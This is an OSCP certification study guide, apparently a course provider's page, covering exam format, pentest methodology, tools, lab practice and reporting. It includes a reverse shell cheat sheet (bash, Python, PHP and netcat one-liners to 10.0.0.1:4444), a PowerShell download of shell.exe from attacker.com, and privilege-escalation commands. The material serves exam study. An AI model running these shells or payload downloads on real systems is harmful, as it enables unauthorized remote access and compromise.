How to Prepare for OSCP Exam
Your Complete Roadmap to Offensive Security Certification Success
Understanding the OSCP Certification
The Offensive Security Certified Professional (OSCP) represents the gold standard for hands-on penetration testing certifications. Unlike multiple-choice certifications, OSCP requires demonstrating practical skills by compromising machines in a real-time environment. This approach ensures certified professionals possess actual offensive security capabilities, not just theoretical knowledge.
The certification journey through the Penetration Testing with Kali Linux (PEN-200) course transforms you from a security enthusiast into a capable penetration tester. The curriculum covers real attack techniques used by adversaries, emphasizing methodology over memorization. Success requires not just learning techniques but developing the problem-solving mindset essential for security professionals.
OSCP Exam Structure Overview
- - 23 hours 45 minutes for hands-on testing
- - 24 hours after exam for report writing
- - Isolated VPN environment access
- - Multiple machines of varying difficulty
- - Network infrastructure to pivot through
- - Minimum 70 points out of 100
- - 10 points for comprehensive documentation
- - Lab report bonus points available
- - Detailed methodology required
- - Standalone machines: 20-25 points each
- - Buffer machines: 10-20 points
- - Active Directory sets: 40 points total
- - Difficulty ranges from beginner to advanced
- - Professional penetration test report
- - Step-by-step exploitation process
- - Screenshots of all significant steps
- - Proof of compromising each machine
Prerequisites and Foundation Skills
Before diving into OSCP preparation, ensure you have the necessary foundational knowledge. Attempting OSCP without proper preparation leads to failure and wasted investment. Building solid fundamentals makes the certification journey significantly smoother and more rewarding.
Linux Fundamentals
Navigation, file operations, text processing with grep, awk, sed
chmod, chown, sudo, useradd, /etc/passwd, /etc/shadow
ps, top, kill, backgrounding processes, cron jobs
ip addr, netstat, ss, ping, traceroute
Networking Knowledge
TCP handshake, UDP, common ports, packet structure
CIDR notation, private vs public ranges, subnet masks
Default gateway, routing tables, VLAN basics
Zone transfers, record types, name resolution
Scripting Requirements
While OSCP does not require expert programming skills, basic scripting ability is essential for automation and exploitation customization.
# Bash Scripting - Essential for automation
#!/bin/bash
for ip in $(cat hosts.txt); do
echo "Scanning $ip..."
nmap -sV -sC -p- $ip -oA scan_$ip
done
# Python - Useful for exploitation
# - Modifying exploits
# - Quick automation scripts
# - Understanding tool source code
# Focus on: socket programming, file I/O, subprocess
# PowerShell - Windows post-exploitation
Get-Process | Where-Object {$_.CPU -gt 100}
Get-NetUser | Select-Object samaccountname
Invoke-WebRequest -Uri "http://attacker.com/shell.exe" -OutFile shell.exeBuilding Your Attack Methodology
OSCP success depends on developing a repeatable, systematic approach to penetration testing. Rather than trying random techniques, successful candidates follow structured methodologies that ensure comprehensive coverage without wasting time on irrelevant activities.
The OSCP Penetration Testing Methodology
# Phase 1: Information Gathering # Passive Reconnaissance # - Certificate searches, WHOIS lookups # - Google dorking, job postings analysis # - Social media intelligence # Active Reconnaissance # nmap -sV -sC -p- -T4 -oA scan_result target_ip # UDP scan: nmap -sU -p 161,123 target_ip # Vulnerability scan: nmap --script vuln target_ip # Phase 2: Enumeration # Service Identification # - Identify version numbers # - Identify operating systems # - Banner grabbing # Port-specific Enumeration # HTTP: gobuster, nikto, dirb, CMS identification # SMB: enum4linux, smbclient, nmap scripts # DNS: zone transfers, subdomain enumeration # SMTP: user enumeration, VRFY commands # Phase 3: Exploitation # Research vulnerabilities # - Searchsploit for exploit-db # - Google, exploit-db.com, GitHub # - Verify exploit compatibility # Exploitation attempts # - Public exploits with modifications # - Custom exploit development # - Brute force where appropriate # Phase 4: Post-Exploitation # Local Enumeration # - OS version, architecture # - User context, privileges # - Network connections # - Interesting files # Privilege Escalation # - Kernel exploits # - SUID/SGID binaries # - Sudo misconfigurations # - Service exploits # - Scheduled tasks # Phase 5: Pivoting # Network enumeration from target # - Static routes # - Port forwarding # - Tunneling
Thorough enumeration prevents missed opportunities
Customization and adaptation skills critical
Most machines require privesc to score points
Essential Tools Mastery
OSCP requires proficiency with specific tools that appear throughout the exam and labs. Mastering these tools to the point of automation ensures efficient exploitation during time-limited exam conditions.
Scanning and Enumeration
# Nmap - Your primary scanning tool # Full TCP scan with version detection nmap -sV -sC -p- -T4 -oA full_scan target # Quick scan for initial recon nmap -sV --open -oA quick_scan target # UDP top 100 ports nmap -sU --top-ports 100 -oA udp_scan target # Nmap Script Engine nmap --script vuln,discovery target nmap --script smb-enum-* target nmap --script http-enum target # Gobuster - Directory enumeration gobuster dir -w /usr/share/wordlists/dirb/common.txt \ -u http://target.com -t 50 -o gobuster.txt # dirb - Quick directory scanning dirb http://target.com /usr/share/wordlists/dirb/common.txt # Searchsploit - Exploit database searchsploitapache 2.4 searchsploit -m 40947.py searchsploit remote linux debian
Exploitation and Shells
# Metasploit Framework
msfconsole
search exploit_name
use exploit/path/to/exploit
set options
exploit
# Standalone exploitation
# Download, read, modify, execute
# NEVER run exploit.py without reading
# Reverse Shell Cheat Sheet
# Bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat
nc -e /bin/bash 10.0.0.1 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
# Stabilize shells
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z then 'stty raw -echo; fg; reset'
# Upload/download
# Download: wget, curl, nc
# Upload: python http.server + wgetPrivilege Escalation Resources
# Linux Privilege Escalation # Automated Scripts ./linpeas.sh ./linux-exploit-suggester.sh ./unix-privesc-check # Manual Checks # SUID binaries find / -perm -4000 -type f 2>/dev/null # GTFOBins for privesc via SUID # Sudo permissions sudo -l # Kernel exploits uname -a cat /etc/issue searchsploit "Linux Kernel" # Windows Privilege Escalation # Automated Scripts ./winpeas.exe ./Sherlock.ps1 ./PowerUp.ps1 # Manual Checks # Service permissions sc qc service_name accesschk.exe -ucqv service_name # AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer # Unquoted service paths wmic service get name,pathname Get-Service | Select Name, PathName
gtfobins.github.io
lolbas-project.github.io
github.com/swisskyrepo
Lab Practice Strategy
The OSCP labs provide a simulated corporate network with diverse systems and challenges. How you approach the labs significantly impacts your exam readiness. Random attacking yields poor results while systematic methodology development builds transferable skills.
Recommended Lab Approach
Complete the official course material and exercises. Focus on understanding concepts, not rushing. Take detailed notes on every technique demonstrated.
Begin with the Starting Point machines that guide methodology development. These provide hints and structured learning paths. Master basic enumeration and exploitation.
Tackle lab machines independently. Document every step, screenshot all progress, and build your methodology. Target 30-40 machines minimum before exam attempt.
Focus on the deeper networks requiring pivoting. Understand tunneling, port forwarding, and multi-hop attacks. Active Directory skills are increasingly important.
Review all techniques, redo difficult machines, and supplement with HackTheBox/Proving Grounds. Focus on weak areas identified during practice.
Practice Platform Alternatives
Active retired machines mirror OSCP difficulty. Start with Easy, progress to Medium. OSCP-like boxes include Bounty, Legacy, Netmon, and Bastion.
Beginner-friendly with guided paths. The OSCP path provides structured preparation. Excellent for building fundamentals before harder challenges.
Official supplementary labs similar to OSCP exam environment. Machines rated by difficulty. Excellent bridge between course material and exam.
Free vulnerable VMs to download and practice locally. Wide variety of challenges. Download the OSCP-like VMs and practice in VirtualBox.
Report Writing and Documentation
OSCP requires comprehensive documentation of your testing methodology. Poor documentation fails candidates even when machines are compromised correctly. Developing documentation habits during lab practice ensures exam success.
Essential Documentation Elements
# Documentation Template ## Table of Contents ## Executive Summary ## Scope Definition ## Methodology ## Information Gathering ## Vulnerability Analysis ## Exploitation ## Post-Exploitation ## Conclusion # Per-Machine Documentation Structure ## Target: [Machine Name] ### IP Address: 10.x.x.x ### Operating System: Linux/Windows ### Service Enumeration [Include nmap output] [Document all discovered services] ### Vulnerability Identification [Document vulnerabilities found] [Include research sources] ### Exploitation Steps 1. [Step-by-step with commands] 2. [Include relevant output] 3. [Screenshot: Exploitation success] ### Post-Exploitation [Local enumeration results] [Privilege escalation method] [Screenshot: Root/Admin access] ### Proof [Screenshot: Proof of access] [Contents of proof.txt/root.txt] # Screenshots Required - Service identification - Exploitation attempts - Shell obtained - Local enumeration - Privilege escalation - Proof files (flag contents)
Exam Day Strategy
Exam success requires not just technical skills but also careful time management and mental preparation. Many technically capable candidates fail due to poor planning. Developing an exam strategy in advance and practicing it during lab sessions ensures you perform optimally under pressure.
Exam Time Management
# Recommended Exam Schedule # Hour 0-1: Initial Recon - VPN connection test - Network enumeration - Brief assessment of all targets - Create screenshots folder structure - Set time limits per machine # Hour 1-6: Initial Attacks - Target easy machines first - Secure 20-30 points baseline - Document everything as you go - Move on if stuck for 30-45 minutes # Hour 6-12: Deep Enumeration - Return to stuck machines with fresh perspective - Focus on medium difficulty machines - Target 40-50 points - Keep detailed screenshots # Hour 12-18: Hard Machines - Attempt harder targets - Try AD set if not done - Use hints sparingly # Hour 18-23: Buffer Building - Target 70+ points for safety margin - Complete documentation of all machines - Begin report outline # Hour 23-24: Documentation - Final proof screenshots - Compile all evidence - Review methodology section # If scoring 70 points early - STOP attacking - Complete documentation - Submit report draft - Rest before submission
- - Take 15-minute breaks every 2 hours
- - Eat regular meals, stay hydrated
- - Sleep 4-6 hours if possible
- - Keep notes organized from start
- - Spending too long on one machine
- - Neglecting documentation
- - Panic when stuck
- - Skipping breaks until exhausted
Frequently Asked Questions
What is the OSCP certification and why is it valuable?
OSCP (Offensive Security Certified Professional) is a hands-on penetration testing certification from Offensive Security. It validates the ability to identify vulnerabilities, execute organized attacks, and compromise systems within a simulated corporate environment. OSCP is highly valued in the industry because it requires practical skills demonstrated under exam conditions, not just theoretical knowledge. It is often a required certification for penetration testing and red team roles.
How long does OSCP exam preparation typically take?
OSCP preparation time varies based on prior experience. Complete beginners typically need 4-6 months of dedicated study with 15-20 hours per week. Those with IT experience might need 2-4 months, while security professionals with pentesting background might prepare in 1-2 months. The official course (PEN-200) suggests 30-60 hours of content plus significant lab time. Most successful candidates report 200-400 hours of total preparation including lab work and practice.
What are the minimum requirements before taking OSCP?
Offensive Security recommends familiarity with Linux, understanding of networking concepts (TCP/IP, DNS, HTTP), and basic scripting skills (Bash, Python). However, these are minimums, not guarantees of success. Strong fundamentals in these areas significantly improve your chances. Many successful candidates have backgrounds in system administration, development, or IT support. If you are completely new to security, consider starting with eJPT or CompTIA PenTest+ before OSCP.
How hard is the OSCP exam and what is the pass rate?
OSCP is considered one of the most challenging entry-level penetration testing certifications. The exam involves compromising multiple machines within a 24-hour window in an isolated VPN environment, followed by a detailed penetration test report due within 24 hours after. Most estimates suggest a 40-60% first-attempt pass rate, though Offensive Security does not publish official numbers. With thorough preparation, many candidates pass on their first attempt. Retakes are available but costly.
What is the best way to use the OSCP labs effectively?
Effective OSCP lab preparation involves systematic methodology development rather than random attacking. Start with the starting point machines to build methodology, then branch to adjacent networks as you gain access. Focus on understanding privilege escalation techniques thoroughly. Take detailed notes including screenshots and command outputs for your exam report. Complete all lab machines at least twice. Join the OffSec forums for hints without spoiling the learning experience. Supplement with HackTheBox and TryHackMe for additional practice.
How should I approach the OSCP exam day?
Exam success requires careful time management. Start with a brief reconnaissance phase to understand the network, then target the easier machines first to build momentum and secure points. Set time limits for each machine and move on if stuck. Maintain detailed notes and screenshots throughout for your report. Take breaks to stay fresh. If you score 70 points during the exam, you can finish documentation and rest. Target 80+ points to have a buffer. Sleep is allowed but keep it short. Submit your report within 24 hours of exam completion.
Start Your OSCP Journey
Build the penetration testing skills required for OSCP success. Our ethical hacking course provides the foundation you need.